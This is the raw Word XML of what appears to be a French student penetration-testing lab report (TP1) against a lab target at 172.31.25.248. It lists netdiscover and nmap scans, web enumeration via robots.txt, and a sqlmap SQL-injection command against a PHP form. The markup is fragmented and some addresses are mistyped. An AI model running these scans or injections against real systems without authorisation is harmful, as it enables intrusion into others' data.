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42"/>
          <w:szCs w:val="4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rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
          <w:u w:val="single"/>
          <w:shd w:fill="cfe2f3" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vjxtpi2wyarq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48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
          <w:shd w:fill="cfe2f3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SAE3.CYBER.04 TP1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sz w:val="42"/>
          <w:szCs w:val="4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Fonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:shd w:fill="a4c2f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environnement 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Machine Kali : Linux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user : kali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password : kali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Présentation : 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IP Cible : 172.31.25.248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Fonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:shd w:fill="a4c2f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Etape 1 :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netdiscover : pour la reconnaissance ARP.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nmap -sS A 172.31.25.248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3479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nmap -p- A 172.31.25.248 (on va éviter de faire cette commande (ddos))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ssh 172.31.25.248 22 : pour se connecter à ssh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34798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Fonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:shd w:fill="a4c2f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Etape 2 :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nmap -r Pn -p 1,2,3 172.31.25.248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26162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nmap -p 12000 A 172.31.25.248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19558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On peut maintenant aller sur : http://172.31.25.24:1337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2709863" cy="3816899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3816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Fonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:shd w:fill="a4c2f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Etape 3 :</w:t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172.31.25.248:1337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr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449725" cy="1755308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9725" cy="1755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on ajoute /images à : 172.31.25.248:1337</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr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4005561" cy="2595879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561" cy="2595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3954300" cy="2857301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4300" cy="2857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172.31.25.248:1337/robots.txt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1854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On récupère le code : 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6731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6731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On va sur la page php : </w:t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2184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3111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Fonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:shd w:fill="a4c2f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Etape 4 :</w:t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sqlmap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-u “http://172.31.25.2481337/978345210/index.phpˮ –form –dbs –level=3 –batch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3.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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image" Target="media/image8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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